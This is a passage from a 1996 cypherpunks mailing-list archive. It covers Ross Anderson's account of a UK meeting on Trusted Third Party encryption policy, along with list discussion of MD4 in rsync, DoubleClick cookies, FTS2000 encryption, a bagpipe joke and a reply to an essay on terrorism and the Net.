GCHQ board member. He remarked that the debate on encryption had been
acrimonious, especially in the USA, but that now technology made
possible a compromise in the form of `Trusted Third Parties' which
would supply a key delivery service and a key recovery service for
both users and law enforcement authorities.

I asked him whether his department had advised ministers that it was
all right to release the April report on encryption in the NHS network
(which floated the TTP idea), or had at least had sight of it before
its release. He claimed to have no knowledge of whether his agency had 
seen it.

After a talk on the common criteria by Murray Donaldson of the
Ministry of Defence, Saunders left, and we were addressed by a man
introduced as Paul Fleury, head of the information systems security
group at the security service. He was claimed to have been with MI5
for 18 years, and in his current post for 5; and to head a team of 9
people responsible for the overall UK threat assessment (with
technical input from GCHQ), as well as for managing CRAMM and running
UNIRAS (the UK government equivalent of CERT).

Strangely enough for such a senior and responsible person, his name did
not appear on the programme, and in the list of participants he appears
only as `UNIRAS SPEAKER, Security Service, PO Box 5656, London EC1A 1AH'
(so now you know - but why did he turn up with slides that had his name
on them and yet not write his name in the attendance register?)

His talk contained little to surprise, with statistics on viruses, 
equipment thefts and hacking. He did mention that 98% of the 873 hacking 
incidents in 1994/5 were abuse of access by insiders rather than 
external attack.

The third talk was by Elizabeth France, the Data Protection Registrar,
who expressed amusement at my having ironically referred to her (along
with the other speakers) as `one of the forces of darkness' when I
relayed notice of the meeting to the net. She proceeded to blaze with
light; she argued that the national security exemptions to data
protection law should be curtailed, and could see no reason why the
security service should not have to register along with everybody
else. She also pleaded for the wider use of privacy enhancing
technologies, such as the use of pseudonyms in medical databases.

Next was John Austen of the Yard, who pointed out that company
directors can get ten years' jail if one of their employees has
kiddieporn on a company server, since under the Children and Young
Persons Act simple possession is an offence. Then Bob Hill of the MoD
talked about the SOS-TDP project to provide security interfaces in
Microsoft, Novell and DEC products, linked with Northern Telecom's
`Enterprise Security Toolkit'; David Ferbrache of DRA talked about
security threats from the Internet; John Hughes of TIS about
firewalls; and Alex McIntosh of PCSL about how his company built a
crypto infrastructure for Shell and got government approval for it.

The threat model depicted in these talks was remote from reality. For
example, it was categorically stated that most thefts of PCs are for
the information in them, rather than the resale value of the machine
or its components. False - over 11% of UK general practitioners have
experienced theft of a practice PC, yet there is only one case known
to the BMA in which the information was abused.  Another example was
the numbers put on various threats: satellite TV hacking was said to
cost 300,000 pounds a year (according to News Datacom at Cardis 94,
that should be 200,000,000) while other risks were wildly inflated.

Bob Morris, the former NSA chief scientist, is fond of asking security
researchers, `Do you consider yourself to be more dishonest, or more
incompetent?' Well, does GCHQ know that the threat model presented at
their meeting is wrong, or don't they?

Anyway, Alex McIntosh's talk brought matters back to crypto policy
when he explained that following UK and US government approval of a 
corporate security architecture designed for Shell, Fortune 500 
companies would be trusted to manage their own keys. The explanation is
that they have so much to lose that they will be responsive to warrants 
and subpoenas. (The doctrine of equality of persons before the law was 
not, of course, mentioned.)

The final speaker was Nigel Hickson from the DTI. The excuse given for
his late arrival ws that he had been in France with the OECD and had
been discussing crypto policy for three days. He looked somewhat junior
but was said to co-chair the ITSEC scheme with CESG and to be one of a
group of five people in DTI responsible for information security policy.

In the introduction to his talk, he picked up on Alex's remarks about
Shell and stated that the motivation for the DTI's involvement was
that while `large firms will crack security', it would be an
inhibiting factor for small-to-medium firms and individuals, and would
prevent them participating in commerce on the Internet (this seemed to
clash with the policy announcement that corporate encryption would be
regulated but private would not be).

He then quite blatantly waffled until his time was almost up before
getting to the reason most people had come to the meeting, namely the
DTI announcement of its intent to regulate `Trusted Third Parties'. My
notes on his words are as follows:

 Why the UK announcement? Many reasons, some of which are highlighted in
 the public statement. The primary reason is that to secure electronic
 commerce people will need access to strong crypto, and if this is serious 
 then government will have to look at what systems are `appropriate'. The 
 UK government has spent a lot of time discussing the essential balance.
 Continued law enforcement access is required along the lines of the
 Interception of Communications Act. The government has `obviously' looked
 at TTPs and at `elements of key escrow'. There was no mention of national
 intelligence requirements.

 Policy framework for the provision of encryption services:

 1	No new controls on the use of encryption, such as types of
	algorithm. The introduction of trusted third parties will be
	on a voluntary basis;

 2	Licensing of TTPs will be on (a) competence (b) ability to
	provide a service (c) cooperation with government under 
	conditions of warranted interception;

 3	International working will be the essential vehicle to drive it
	- first in Europe and then in a wider field.

 Legislation later this year is possible. The EU is working on a `second
 infosec decision' to promote TTPs in Europe. The OECD expert group is
 working on global crypto guidelines.

By the time he had finished this short exposition, he had run over the 
advertised time of 4.15, eating well into the fifteen minutes that the 
programme had allocated for discussion. There were only a few questions:
Paul Leyland managed to ask whether it would be mandatory for 
confidentiality keys to be escrowed, and Hickson said yes.

Just as the questions were starting to flow, the chairman - advertised
as Mr DJ Robertson, Ministry of Defence - declared the meeting closed. I 
objected; I pointed out that there were plenty of people with questions, 
and that the government's attempts to sell their proposal would not be 
aided by such blatant news management, which would surely be reported. He 
said that we absolutely had to be out of the room by half past four - the 
time then - and overruled me, remarking that the Universities of Oxford 
and Cambridge had asked quite enough questions.

Then a large gentleman came up to me and said that he hoped my remark
about publicising their news management had been made in jest. I told him 
that it was not, and he became menacing. He said that the meeting was 
held under IEE rules and seemed taken aback when I stood my ground and 
told him I was a member. He then said that he was also a graduate of 
Cambridge and that he would write to very senior people in the University 
about me. Good luck to him. Although he wouldn't give me his name, his 
lapel badge said `B Buxton' and the attendance register lists a Bill 
Buxton, Parity Solutions Ltd., Wimbledon Bridge House, 1 Hartford Road, 
Wimbledon SW19 3RU.

After the meeting, we milled around, to the evident discomfiture of the 
man advertised as Robertson. Finally, at almost five o'clock, an IEE 
lady turned up while there were still a few of us in the corridor. He 
asked her to see us off the premises, at which she smiled and asked
whether we knew our way out. When I said yes, she said 'that's all right 
then' and went off. The man advertised as Robertson scuttled away without
meeting my eye.

As Bob would ask, incompetence or dishonesty? Well, I didn't get the 
impression that our spooks are even competent at being dishonest.

Ross Anderson




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Tridgell <tridge@arvidsjaur.anu.edu.au>
Date: Sun, 30 Jun 1996 15:10:34 +0800
To: root@edmweb.com
Subject: Re: rsync and md4
In-Reply-To: <Pine.BSF.3.91.960629145318.187A-100000@bitbucket.edmweb.com>
Message-ID: <96Jun30.105019+1000est.65036-6357+785@arvidsjaur.anu.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


> The odds of a certain file having a certain hash are one in 2^128. But,
> the odds of any two files having the same hash (the "Birthday Attack") is
> just one in 2^64. 

The birthday paradox doesn't apply in my case I believe. Its not an
all-to-all comparison. One file is "given" by the user. I'm definately
not a crypto-expert, however, so I could be wrong.

> That's good, because MD4 collisions can be produced in a matter of
> minutes. But if you're not concerned about attacks, then MD4 is probably
> more than you need. 

I'd like to know more about this. 

> You could, but why bother? If you've got a 14.4 or faster modem, you can
> send a lot of hashes in a short time. The real load won't come until you
> try to download an altered file. 

You'd have to read the tech report on rsync. It does not download the
whole file when a checksum mismatch is found, that would be next to
useless. 

It effectively creates binary diffs of the two files, without direct
(local) access to both files. As far as I know this is a new type of
algorithm.

In practice the hashes and checksums dominate the data that is sent
over the link. They total about 1/30 of the total file size for the
default settings.

> MD4 is not strong- people can deliberately produce files with the same
> hash in a matter of minutes. MD5 is secure for now, but it seems to be
> gradually falling to cryptanalysis, and should be phased out of use before
> it breaks. IMO the best hash algorithm is SHA1 (which is an updated
> version of the original SHA). Do a web search for "FIPS PUB 180-1" for the
> specs. 

Do you have references to the md4 collision stuff? The situation I
have is a bit unusual so its just possible some of the results may
apply. 

> For what you're doing it sounds like you don't need a cryptographically
> secure hash function. If you're not concerned about people deliberately
> trying to defeat the system, then just use a 32-bit CRC.

It already uses a 16 bit hash as a first level filter and a 32 bit
"rolling checksum" as the 2nd level. The 2nd level fails about 25
times on a 25MB test file I've been using. The failure rate goes as
the square of the file length. When the 2nd level fails it is detected
by the md4 hash which has to be much stronger.

Cheers, Andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 30 Jun 1996 21:29:59 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: UK Crypto regs?
Message-ID: <199606301058.KAA02005@pipe3.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam, 
 
 
Thanks for forwarding that delightful report from Ross Anderson on the IEE
TTP romp. 
 
 
His grimly comical description of the hauty evasiveness of governmental
infosec turkeys fits the U.S. sessions on GAK. These power-drunk birds just
aren't used to answering to an aroused, sober, informed public on the
cluckers' no longer secretly enjoyed private stocks of
if-you-gnu-what-we-brew inebriants. 
 
 
Pray British rabble-rousers continue to grieve the red-nosed authorities as
have the colonials theirs. 
 
 
Is there more info on when the OECD report is due? 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Tridgell <tridge@arvidsjaur.anu.edu.au>
Date: Sun, 30 Jun 1996 15:01:44 +0800
To: ogren@cris.com
Subject: Re: rsync and md4
In-Reply-To: <199606300025.UAA04020@darius.cris.com>
Message-ID: <96Jun30.110048+1000est.65037-6357+787@arvidsjaur.anu.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


> MD4 is the fastest hash I am aware of.  However, there has been some 
> successful attacks against two rounds of MD4.  Although this is not to 
> suggest that MD4 is insecure, MD5 almost as fast (~1.3 times slower) and 
> more secure.

I thought md5 was slower than that, but I'm only going by my
(addmitedly poor) memory of some comments in the tripwire docs. I'll
give it a go sometime.

One annoying think about the md4 implementation that I have is that on
little endian machines it byte reverses the words in the buffer its
hashing so I need to make a copy of the buffer each time. Is there a
version of md4 that doesn't do this?

Cheers, Andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Mon, 1 Jul 1996 15:47:04 +0800
To: cypherpunks@toad.com
Subject: Re: rsync and md4
In-Reply-To: <199606301747.NAA18634@jekyll.piermont.com>
Message-ID: <199606301849.LAA23313@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry writes:

> I'm afraid you are totally wrong here. MD4 has been completely
> broken. I wouldn't trust it for anything. In fact, MD5 is no longer
> trustworthy, either -- it was broken recently. Stick to SHA.

Has MD5 been broken again?  Or are you referring to that little
collision problem which is unlikely to affect the security of the
typical real life application?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Yanni" <jon@aggroup.com>
Date: Mon, 1 Jul 1996 15:46:45 +0800
To: Eric Murray <scott_wyant@loop.com
Subject: Re: [Fwd: Doubleclick]
Message-ID: <9606301243.AA03585@jon.clearink.com>
MIME-Version: 1.0
Content-Type: text/plain


> [short-attention-span summary:  someone's using Netscape cookies as a
> way to target-market browser users.  Since I hate being targeted, I
> came up with a hack "fix" to prevent it, see below]

Whatever.

> > >Date:    Wed, 26 Jun 1996 19:42:00 -0700
> > >From:    Scott Wyant <scott_wyant@loop.com> Subject: COMMENT:
> > >Cookie dough
> > >
> > >If you're like me, you never went to a site called "doubleclick."
> > >So how did they give you a cookie?  After all, the idea of the
> > >cookie, according to the specs published by Netscape, is to make a
> > >more efficient connection between the server the delivers the
> > >cookie and the client machine which receives it.
> > >But we have never connected to "doubleclick."

Scott must have. Navigator is very picky about where a cookie comes
from and what is put in the domain field of the cookie.

Go read about the domain field in the Cookie spec. Then, write a CGI
to play with setting/deleting cookies yourself. You will find out that
it is actually almost an art to even get a cookie set.

> > >Pay special attention to the information at:
> > ><www.doubleclick.net/advertising/howads.htm>

Maybe this scott wyant guy works for doubleclick? ;)

> > >You'll see that the folks at "doubleclick" make the point that
> > >this entire transaction (between their server and your machine)
> > >is "transparent to the user."  In plain English, that means
> > >you'll never know what hit you.

No sh*t. The cookie spec says that as well.

> > >So what's happening is, subscribers to the doubleclick service put
> > >a "cookie request" on their home page FOR THE DOUBLECLICK COOKIE.

There is no such thing as a "cookie request". It is up to the browser
to send the cookie and up to you to parse it out of the HTTP header.
There is no way that the browser is going to send the cookie unless
the domain and path matches. Go read the Cookie spec.

> > >When you hit such a site, it requests the cookie and take a look to
> > >see who you are, and any other information in your cookie file.
> > >It then sends a request to "doubleclick" with your ID, requesting
> > >all available marketing information about you.  (They're very coy
> > >about where this information comes from, but it seems clear that
> > >at least some of it comes from your record of hitting
> > >"doubleclick" enabled sites.)  You then receive specially
> > >targetted marketing banners from the site.  In other words, if
> > >Helmut Newton and I log on to the same site at the exact same
> > >time, I'll see ads for wetsuits and basketballs, and Helmut will
> > >see ads for cameras.

Whatever. What are you saying doesn't make any sense if you knew what
the heck you were talking about.

> > >If you log in to a "doubleclick" enabled site, and it sends a
> > >request for your "doubleclick" cookie, and you don't have one, why
> > >each and every one of those sites will hand you a "doubleclick"
> > >cookie.

Whatever.

> > >Neat, huh?  And you can bet they're going to be rolling in the
> > >cookie dough.
> > >Me, I edit my cookie file each and every time I go to a new
> > >site.  (Despite the dire warning at the top of the file, you can
> > >edit it with no adverse consequences.)

Whatever.

> > >Oh, and one other thing.  If you edit your cookie file BEFORE
> > >you connect to "doubleclick," and then jump around at the site,
> > >you'll notice that they DON'T hand you a cookie.  I probed the
> > >site pretty carefully, checking the MagiCookie file, and
> > >nothing happened.
> > >
> > >Until I closed Netscape.  The LAST thing the 'doubleclick" site did
> > >was....
> > >You guesed it.  They handed me a cookie.  So much for making
> > >the client-server negotiation more efficient.  (In fairness,
> > >that cookie may have been in memory until I closed Netscape -- I
> > >can't tell for sure.) Scott Wyant
> > >Spinoza Ltd.

No duh. Navigator doesn't fflush() the cookie file until you quit. It
keeps it in memory for speed.

> My own experiments shows that simply removing the cookie file (~/.
> netscape/cookies) works to "fix" this, as long as you don't have
> old netscape config files lying about (then it pops a dialog asking if
> you want to nuke the old config, and uses the old cookies file).
> Netscape (version 3.0b for Linux) doesn't recreate the cookies file.
> Of course this "fix" means that I'm not able to take advantage of
> whatever cookies might offer me, but since I can't control them and
> never see them there's probably not a lot that they do that I'll miss.

Who cares if you can't control them? They don't contain any
information that you don't already know about!

> I think that Netscape should add a configuration to the browser so
> that paranoid privacy fanatics like me can disable cookies or better
> yet control which ones that we'll accept.

Navigator 3.0 has a preference.

-jon (who has had more than enough real world experience with cookies)

Jon (no h) S. Stevens        yanni@clearink.com
ClearInk WebMagus      http://www.clearink.com/
finger pgp@sparc.clearink.com for pgp pub key
We are hiring! Check out...
http://www.clearink.com/clearink/home/job.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 1 Jul 1996 15:46:58 +0800
To: cypherpunks@toad.com
Subject: Re: The Net and Terrorism
Message-ID: <199606301954.MAA20179@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks Tim for your essay.  The only thing I would add is that terrorist
attacks  on pure information resources (e.g. the banking system) are likely
to result in many fewer casualties than terrorist attacks on physical
entities (e.g. major cities).  Another way of saying it is, email bombs are
preferable to snail mail bombs.


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 1 Jul 1996 15:47:22 +0800
To: "David F. Ogren" <ogren@cris.com>
Subject: Re: rsync and md4
In-Reply-To: <199606300025.UAA04020@darius.cris.com>
Message-ID: <199606301747.NAA18634@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"David F. Ogren" writes:
> > MD4 is a hashing algorithm, but it can be used for checksuming.
> > >
> > > A first guess might be 2^-128 but I know that this sort of thing is
> > > rarely that simple. Is md4 that good?
> > 
> > 2^-64.
> 
> Are you sure?  MD5 is a 128 bit hash, and the probability of collision with 
> a specific random piece of data (of any length) should be 2^-128.  I could 
> be wrong, but do you have any explanation of why you think the answer is 
> 2^-64.

Does the phrase "birthday attack" mean anything to you?

> > > Why md4? I chose md4 because it seemed to be the fastest of the
> > > reputedly strong, publicly available checksum algorithms. Suggestions
> > > for alternative algorithms are welcome.
> 
> MD4 is the fastest hash I am aware of.  However, there has been some 
> successful attacks against two rounds of MD4.  Although this is not to 
> suggest that MD4 is insecure, MD5 almost as fast (~1.3 times slower) and 
> more secure.

I'm afraid you are totally wrong here. MD4 has been completely
broken. I wouldn't trust it for anything. In fact, MD5 is no longer
trustworthy, either -- it was broken recently. Stick to SHA.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 1 Jul 1996 15:46:19 +0800
To: cypherpunks@toad.com
Subject: Re: Cookies anyone?
Message-ID: <2.2.32.19960630205357.00af51c8@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:34 PM 6/29/96 -0700, vanished@alpha.c2.org wondered what happens if he
tosses his cookies:
>While rummaging around in my cookie jar, I found this message--along with
some >cookies.
>
>:Netscape HTTP Cookie File
>:# http://www.netscape.com/newsref/std/cookie_spec.html
>:# This is a generated file!  Do not edit.
>
>Rather than bring down my system by experimenting, I thought I'd ask the
list, >"What happens if I delete this file?" and "What happens if I delete
(edit) the >cookies?"

If you edit the file, Netscape may no longer be able to read the file
correctly.  (Bookmarks are similar in this respect.  Netscape code is pretty
picky about things like line termination and the like.)

If you toss your cookies, Netscape will probibly bring you more cookies, but
they will be different cookies than the last batch.  

Beware of burned cookies, fortune cookies (espicially ones with "Good Times"
written on them), raisin cookies (especially if the raisins move), Brownies
under the age of consent, and the cookies from dusty vending machines
(Especially the hairy green ones).
>
>This may have been discussed before, but until now I never checked for cookies.

You might also read the cookie recipie at
http://www.netscape.com/newsref/std/cookie_spec.html .  I hear it was
written by a disgruntled Mrs. Fields employee.

>Thanks for your consideration of this matter.

You are welcome.  Have a nice day.

---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Mon, 1 Jul 1996 15:47:10 +0800
To: nson@kpmg.com
Subject: Re: FTS2000 and Encryption?
In-Reply-To: <9605288360.AA836007879@mailgate5.kpmg.com>
Message-ID: <Pine.SCO.3.93.960630134925.4081B-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 28 Jun 1996 nson@kpmg.com wrote:

> I trying to find out if there are any talks, decisions or even standards being 
> discussed for encryption and FTS2000?

The current FTS2000 contains little in the way of protection other than
the proprietary standards undertaken by the vendors (mostly OPSEC and
PHYSEC), and the "customer"  level crypto that's operated above the layers
provided by the FTS2000 networks. 

In the FTS2000 follow-on contract, however, things are going to change. 
The Govvies are mandating compliance with a security policy (wow - that's
an incredible change) and network management traffic has to be protected. 
Further, overhead and orderwire bytes, etc., will also have to be
protected.  The Government isn't mandating how, but the bidding vendors
are expected to propose solutions.  Further, there are going to be some
standards for points of demarcation between adjacent networks.  The
security policy and RFP materials are on the 'net (I can't get to the web
right now, or I'd post the URL with this message).  From what I remember,
the RFP does state that all payload data will be encrypted by the
Government using NSA-approved crypto and that the vendors are not to
"worry about" what's in the payloads.  All they have to do is carry it
from point a to point b.

I imagine that we'll see contining developments in the STU-III area (the
most popular crypto phone in Government use), as well as new devices
supporting Type I and Type II crypto for use on the FTS2000 nets.

------------------------------------------------------------------------- 
|Just as the strength of the Internet is  |Mark Aldrich                 |
|chaos, so the strength of our liberty    |GRCI INFOSEC Engineering     |
|depends upon the chaos and cacophony of  |maldrich@grci.com            |
|the unfettered speech the First Amendment|MAldrich@dockmaster.ncsc.mil |
|protects - District Judge Stewart Dalzell|                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Mon, 1 Jul 1996 15:46:02 +0800
To: jon@aggroup.com (Yanni)
Subject: Re: [Fwd: Doubleclick]
In-Reply-To: <9606301243.AA03585@jon.clearink.com>
Message-ID: <199606302113.OAA27031@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Yanni writes:
> 
> > [short-attention-span summary:  someone's using Netscape cookies as a 
> > way to target-market browser users.  Since I hate being targeted, I 
> > came up with a hack "fix" to prevent it, see below] 
> 
> Whatever.

Whatever?

> > > >Date:    Wed, 26 Jun 1996 19:42:00 -0700 
> > > >From:    Scott Wyant <scott_wyant@loop.com> Subject: COMMENT: 
> > > >Cookie dough 
> > > > 
> > > >If you're like me, you never went to a site called "doubleclick."  
> > > >So how did they give you a cookie?  After all, the idea of the 
> > > >cookie, according to the specs published by Netscape, is to make a 
> > > >more efficient connection between the server the delivers the 
> > > >cookie and the client machine which receives it. 
> > > >But we have never connected to "doubleclick." 
> 
> Scott must have. Navigator is very picky about where a cookie comes 
> from and what is put in the domain field of the cookie.


I had a cookie in my cookies file from them also, and had
not been to their site before.

There's a very obvious way to get their cookie put in
your cookies file without you explicitly going to their site.  I'm
sure a smart boy like you could figure it out.


[...]


> > My own experiments shows that simply removing the cookie file (~/.
> > netscape/cookies) works to "fix" this, as long as you don't have 
> > old netscape config files lying about (then it pops a dialog asking if 
> > you want to nuke the old config, and uses the old cookies file).  
> > Netscape (version 3.0b for Linux) doesn't recreate the cookies file.  
> > Of course this "fix" means that I'm not able to take advantage of 
> > whatever cookies might offer me, but since I can't control them and 
> > never see them there's probably not a lot that they do that I'll miss. 
> 
> Who cares if you can't control them? They don't contain any 
> information that you don't already know about!


The server can send whatever it wants to you
in the Set-Cookie: header.  Read the spec.

The user can set Netscape to pop up an alert when a cookie is
sent, and it says what the cookie is.  However there's no
standard encoding format so you get stuff like "IAF=zb87"
or "X=VGhlIGxhdW5jaCBjb2RlIGlzICdiYW5kZXJzbmF0Y2gnCgAA"
which as far as most users are concerned is gibberish, although
it could be base64 encoded "The launch code is 'bandersnatch'".
Most people will accept whatever they're given, assuming that they
can even find the preference for accepting cookies.




-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Mon, 1 Jul 1996 15:47:15 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: crypto and bagpipes [NOISE]
In-Reply-To: <199606292214.PAA15653@mail.pacifier.com>
Message-ID: <Pine.SCO.3.93.960630142047.4081D-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 29 Jun 1996, jim bell wrote:

> At 01:01 PM 6/29/96 -0700, Michael Myers wrote:
> >>Perry E. Metzger wrote:
> >>| vinnie moscaritolo writes:
> >>| > >>>Mr Brooks, the piper, 
> >             (...)
> >>| > >>>claims he wasn't playing a musical
> >>| > >>>instrument, but practising with a weapon!
> >>| > >>>
> >>| > >>>The imagination boggles if his claim is successful!
> >>| 
> >>| No one who has heard sustained bagpipe playing can deny the fact that
> >>| bagpipes are indeed an instrument of war, with no legitimate place in
> >>| peaceful everyday society.
> >>| 
> >>| Perry
> >
> >Of course...when bagpipes are outlawed...
> 
> Do you mean the FULL-AUTO "Assault Bagpipes," the ones that produce more 
> than one "toot" per blow?  Or the more "responsible" (but still dangerous!) 
> semi-auto bagpipes, where you have to blow each time you want a toot.

I understand that, even now, the Government is testing nuclear powered
bagpipes (NPB's), unmanned ariel bagpipes (UAB's), and highly classified
inter-continental bagpipe delivery systems (IBDS's).

Can this be the end of civilization as we know it?

------------------------------------------------------------------------- 
|Just as the strength of the Internet is  |Mark Aldrich                 |
|chaos, so the strength of our liberty    |GRCI INFOSEC Engineering     |
|depends upon the chaos and cacophony of  |maldrich@grci.com            |
|the unfettered speech the First Amendment|MAldrich@dockmaster.ncsc.mil |
|protects - District Judge Stewart Dalzell|                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 1 Jul 1996 15:45:40 +0800
To: "Mark O. Aldrich" <nson@kpmg.com
Subject: Re: FTS2000 and Encryption?
Message-ID: <199606302228.PAA19168@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  1:57 PM 6/30/96 -0400, Mark O. Aldrich wrote:
>... The [FTS2000 follow-on contract - WSF]
>security policy and RFP materials are on the 'net (I can't get to the web
>right now, or I'd post the URL with this message).

Please post the URL when you can.


>From what I remember,
>the RFP does state that all payload data will be encrypted by the
>Government using NSA-approved crypto and that the vendors are not to
>"worry about" what's in the payloads.  All they have to do is carry it
>from point a to point b.

Given that FTS2000 supports X.25 Packet Assembly Disassembly (PADs), there
is a wide field ahead for screwing up such useful features as 8-bit
transparent characters and data forwarding (i.e. When does the PAD decide
it has a complete packet and actually send it).  Try running emacs without
good data forwarding control.


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 1 Jul 1996 15:46:41 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: rsync and md4
In-Reply-To: <199606301849.LAA23313@netcom18.netcom.com>
Message-ID: <199606301942.PAA18888@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mike Duvos writes:
> Perry writes:
> 
> > I'm afraid you are totally wrong here. MD4 has been completely
> > broken. I wouldn't trust it for anything. In fact, MD5 is no longer
> > trustworthy, either -- it was broken recently. Stick to SHA.
> 
> Has MD5 been broken again?  Or are you referring to that little
> collision problem which is unlikely to affect the security of the
> typical real life application?

I'm not refering to the old pseudocollision problem in the compression
from over a year back. A couple of months ago a real break was made as
I recall. It wasn't perfect but it was enough.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 1 Jul 1996 15:45:27 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: The Net and Terrorism
In-Reply-To: <adfaddeb070210049285@[205.199.118.202]>
Message-ID: <199606302244.PAA23220@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



[TCM]
>Can anything be done? To stop the likely effects of lots more
>surface-to-air missiles, lots more nerve gas available on the black market,
>and so on?
>
>In a word, "no."

there are various parts of this essay I agree with, and other parts that
I don't. your conclusion that such things are unstoppable is quite
tenuous and not backed by evidence. what you fail to note is that
law enforcement agencies usually benefit from the same innovations
in technology that criminals benefit from. the FBI for example has
vastly improved their ability to deal with criminal fingerprints
through technology for example. in fact one could argue somewhat
that government agencies stand to benefit more from new tehcnology
because in some ways they are better organized and better funded
than small nefarious cells of terrorists.

however, I tend to agree that there is a continual arms race going 
on here, and that it's not necessarily desirable. the "solution"
(TCM would argue against the use of such a word) is not to merely
try to have a warfare, siege-like mentality imho, and a continual
"trying to stay ahead of the criminals". we do not have
regular open terrorism in the streets of the US and I see no reason
to think there ever will be as TCM suggests.

nevertheless what his essay misses, and many in law enforcement miss,
are the root reasons for crime. I'm not going to sound like a liberal
here and say criminals are blameless because they have been psychologically
abused. its not excusable to react to any situation through crime or
terrorism. however they have various gripes that are always seeded
in reality. it seems to me no nation-state has ever experimented with
trying to take away the root causes of violence and discontent. 
why? 

because a policeman holding a gun is so much more visceral and
the public responds to this image readily.  other "programs" that
try to decrease discontent among the budding terrorists of tommorrow
are usually ridiculed. it is very difficult to prove that they work
or that they are worth the money. terrorists invariably have a 
patricular pathological psychological profile that sees the world
in terms of "martyrs vs. villians" with the villians in the government,
and the villians taking away or abusing respectable citizens.

the "problem" of terrorism will be solved when we take the view
that insanity and violence is *not* 
a natural aspect of human behavior (as TCM tends to suggest), and that
there are specific environmental conditions that breed it. like
malaria, if you take away the swamplike breeding grounds, you will
largely remove it. such a thing is a radical hypothesis, but one that
nonetheless has never really been tested in practice.

>FBI Director Louis Freeh and the TLA spooks are already sounding the alarm
>about the "Four Horsemen." Sen. Sam Nunn is calling for measures to ensure
>that cyberspace is "secured" and that the Net is not used to further
>chemical and biological terrorism.

the military and spook establishments require threats to survive.
I believe they are largely manufacturing a new one that has marginal
actual danger content.

>I'm not advocating such "terrorism," by the way, merely telling it like it is.

ah yes, the standard amusing TCM disclaimer. hmmm, your signature suggests
otherwise.

>Keep your head down, avoid crowded downtown areas, prepare for moderate
>disruptions, and reject arguments that an American Police State will do
>anything to stop terrorism.

once you lamented about the impractability of Duncan Frissel's 
suggestions for tax avoidance for regular people and a real society.
many of your own suggestions seem to
be to fit into the same kind of category of "not viable for regular
human beings".

>(Remember, terrorism is just warfare carried on by other means, with
>apolgies to Von Clausewitz.)

disagree. the purpose of warfare has traditionally been to seize
something tangible like territory. terrorists are after intangibles--
namely, terror itself, disrupting a "peace process", etc. 
in warfare, the warfare is directly aimed at
obtaining the "thing", like the way Hussein invaded Kuwait. terrorists
do not obtain a physical "thing" by bombing some symbol. terrorism
is extremely symbolic at the root.
however I agree in the use of violence they are identical.

Tim McVeigh apparently bombed the OKC Murrah building for a reason: he was
